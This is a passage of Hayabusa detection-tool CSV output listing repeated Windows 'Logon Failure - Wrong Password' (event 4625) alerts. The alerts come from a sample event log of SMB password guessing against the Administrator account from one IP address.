Administrator | Type: 3 | Computer: zCzr77BhliB4KKeb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:36.401 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Z558005RepKaO1zZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:36.448 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9HFzW25mJz4JLkv7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:36.490 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Y7J8m97GQWt2cbSs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:36.545 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XJrVwcpABBaZ8cyY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:36.585 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VcDw3I4BaFLdIeCZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 
+2016-09-20 01:51:36.637 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: egEpV9aAuCFjwx2I | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:36.677 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: th0ZLWF4YeOaNnkK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:36.712 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ahrOLfdy6DCQ9SfO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:36.751 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xiooSdP5eib8PUE3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:36.794 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: s6nQ2jp9IGYnGeyD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:36.839 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ejMtyR5QNdJFhw1W | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:36.873 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: e50kO0aVhfw5np5T | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:36.913 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 176XyLw6IhEI6NuD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:36.956 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KXCzCSSFvpbWNJFd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:36.993 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XhHRuZYlH8hekaKc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:37.026 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZGIUBFRMQ3OBbOA0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:37.077 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: R7CTT5g1w58eRRlS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:37.117 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JmVccmad66uOK9ox | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:37.163 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: t1jlT6kEcs14dcNZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:37.209 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rBty5jOGkkZSZEyD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:37.245 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0Ci7YUsO5MtFkDSW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:37.347 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 12JToliq9mmAuMTQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 
+2016-09-20 01:51:37.381 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lw9AgAvBGWoXBlim | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:37.418 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ReGDyvRpGknAKqqB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:37.469 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6mdUn8na4asRfpJP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:37.528 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: b7Wm5p4HnNCbkyh2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:37.585 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MQZwerVd6E08X8Ou | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:37.625 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dbDjtLKoX5Q77bn5 | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:37.669 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: O7BNKHiPjzJKCaDk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:37.714 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HHqBI8bzZn5VO9gq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:37.757 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Xz2ZO3b3QSh6Rdqt | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:37.797 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IEfdhrwbTfCpCXKC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:37.844 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kc0LuQzAmQTIF1X3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:37.896 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: WMZ70YmzpVp2h8mY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:37.945 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FFVr3Amq6mA3umiu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:37.985 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hnN15vqZcww8pqTK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:38.027 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: sSuMRF1txQ9g2Mwi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:38.073 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tUuapChhs4CGO1cS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:38.119 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dIMr0hjIkwD8AaEG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 
+2016-09-20 01:51:38.173 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8ww9HMQX0cqmolYQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:38.210 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XJRRZ5e9lARVZDar | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:38.260 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VvUzVoSLqFPAXSWE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:38.304 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SMMgPu1VJIjAWPDW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:38.337 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: I1JjIa4nOKDTLuAD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:38.377 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0J0GJIm1UUXHH9QJ | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:38.419 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YmVX3xIz0hrQFvPr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:38.470 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nv4tKFEmHjiXkVDI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:38.500 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: esdHHJl9LBek9pIo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:38.545 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MWofwwLjwiyBk39P | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:38.589 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dvsHFZe7Z1uJ9Dkv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:38.629 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: 8aDdgwvb1zsZF79k | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:38.668 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AQUb6CnMUtyrMNhF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:38.701 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KP5OxHPsbLHnIUBE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:38.744 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Ysg903vYFhQHYvFJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:38.793 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IySarHtsTvwSP56H | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:38.828 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GnUy8tbCIAVnmhDg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 
+2016-09-20 01:51:38.863 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bfBtc4MnMtPG6MpC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:38.901 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 37b8MGIHY8QwXf9K | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:38.945 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: eDuaWikplDmJNmIE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:38.989 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0kSSoAYJILHCPI7K | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:39.023 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: L9ikrtTGcZYU1556 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:39.064 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ypyd6SagvUXQHhtZ | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:39.100 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QWS37lIJ3Q6ghgMs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:39.149 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: H211KmFImpBRwTGW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:39.193 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 64tO5iBehXQcNc49 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:39.236 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xvxDngRj3j5TAwST | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:39.281 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: O8VYRjMnxDgUTWYf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:39.331 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: EhWphTesbUf0hwi1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:39.385 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MO8VRRVANxIkDzEX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:39.429 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ziSXANiDAf7LRFz5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:39.527 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: g0CvYYtyEcU2riBX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:39.576 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tPg2LKgWMeM0Oqo0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:39.604 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dbzL9T2d4RdeCz4q | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 
